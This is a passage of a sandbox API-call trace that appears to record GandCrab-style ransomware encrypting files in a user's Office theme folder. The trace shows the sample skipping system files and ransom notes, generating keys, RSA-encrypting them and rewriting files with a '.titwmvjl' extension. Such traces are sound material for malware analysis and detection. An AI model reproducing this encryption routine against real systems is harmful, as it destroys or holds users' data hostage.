1 [0077.966] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0077.966] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0077.966] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0077.966] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0077.966] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0077.966] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0077.966] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="ntldr") returned 1 [0077.966] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="NTDETECT.COM") returned 1 [0077.966] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="Bootfont.bin") returned 1 [0077.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx") returned 131 [0077.966] lstrlenW (lpString=".thmx") returned 5 [0077.966] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.966] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0077.966] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.967] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.967] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001114[[fn=gallery]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0077.967] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.967] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0077.980] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.980] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.980] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0077.981] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0077.981] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0077.981] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0077.981] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0077.981] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.982] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.982] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.982] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0077.982] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0077.983] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0077.983] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0077.983] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0077.983] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.983] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.983] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.983] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.984] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0077.984] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.984] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503338) returned 1 [0077.984] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.985] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0077.985] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.985] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0077.985] GetLastError () returned 0x0 [0077.985] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.986] CryptDestroyKey (hKey=0x503338) returned 1 [0077.986] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.986] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.986] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.986] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0077.986] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.987] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503938) returned 1 [0077.987] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.987] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0077.987] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.987] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0077.988] GetLastError () returned 0x0 [0077.988] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.988] CryptDestroyKey (hKey=0x503938) returned 1 [0077.988] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.988] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.988] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0077.988] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0077.989] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x100000, lpOverlapped=0x0) returned 1 [0078.031] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.031] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x100000, lpOverlapped=0x0) returned 1 [0078.037] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.037] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.039] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.043] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.047] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.047] CloseHandle (hObject=0x2ec) returned 1 [0078.060] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001114[[fn=gallery]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001114[[fn=gallery]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0078.061] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.061] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.061] lstrcmpW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2=".") returned 1 [0078.061] lstrcmpW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="..") returned 1 [0078.061] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM10001115[[fn=Parcel]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx" [0078.061] lstrlenW (lpString=".titwmvjl") returned 9 [0078.061] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx") returned 130 [0078.061] VirtualAlloc (lpAddress=0x0, dwSize=0x144, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.062] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx.titwmvjl") returned 139 [0078.066] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx") returned 130 [0078.066] lstrlenW (lpString=".thmx") returned 5 [0078.066] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.066] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0078.066] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0078.066] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.067] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx") returned 130 [0078.067] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx") returned 130 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="desktop.ini") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="autorun.inf") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="ntuser.dat") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="iconcache.db") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="bootsect.bak") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="boot.ini") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="ntuser.dat.log") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="thumbs.db") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="ntldr") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="NTDETECT.COM") returned 1 [0078.067] lstrcmpiW (lpString1="TM10001115[[fn=Parcel]].thmx", lpString2="Bootfont.bin") returned 1 [0078.067] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx") returned 130 [0078.067] lstrlenW (lpString=".thmx") returned 5 [0078.067] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.067] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0078.068] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.068] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.068] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001115[[fn=parcel]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.068] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.069] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.072] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.072] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.072] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.073] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0078.073] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.073] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.073] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.073] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.073] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.074] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.074] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.074] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0078.074] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.074] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.074] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.075] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.075] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.075] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.075] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503278) returned 1 [0078.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.076] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.076] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.076] GetLastError () returned 0x0 [0078.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.076] CryptDestroyKey (hKey=0x503278) returned 1 [0078.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.076] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.077] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.077] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503738) returned 1 [0078.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.077] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.077] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.078] GetLastError () returned 0x0 [0078.078] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.078] CryptDestroyKey (hKey=0x503738) returned 1 [0078.078] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.078] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.078] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0078.078] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0078.078] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x9477a, lpOverlapped=0x0) returned 1 [0078.112] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff6b886, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.112] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x9477a, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x9477a, lpOverlapped=0x0) returned 1 [0078.116] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.116] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.117] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.122] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.125] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.125] CloseHandle (hObject=0x2ec) returned 1 [0078.136] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001115[[fn=parcel]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001115[[fn=parcel]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0078.137] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.138] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 0 [0078.138] FindClose (in: hFindFile=0x5033b8 | out: hFindFile=0x5033b8) returned 1 [0078.138] CloseHandle (hObject=0x2e4) returned 1 [0078.139] FindNextFileW (in: hFindFile=0x5039b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0078.139] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0078.139] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0078.139] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\d2ca4a09d2ca4deb61a.lock" [0078.139] lstrlenW (lpString=".titwmvjl") returned 9 [0078.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\d2ca4a09d2ca4deb61a.lock") returned 121 [0078.139] VirtualAlloc (lpAddress=0x0, dwSize=0x132, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.139] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 130 [0078.149] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\d2ca4a09d2ca4deb61a.lock") returned 121 [0078.149] lstrlenW (lpString=".lock") returned 5 [0078.149] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.149] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0078.149] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.150] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.150] FindNextFileW (in: hFindFile=0x5039b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0078.150] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0078.150] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0078.150] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\TITWMVJL-DECRYPT.txt" [0078.150] lstrlenW (lpString=".titwmvjl") returned 9 [0078.150] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\TITWMVJL-DECRYPT.txt") returned 117 [0078.150] VirtualAlloc (lpAddress=0x0, dwSize=0x12a, 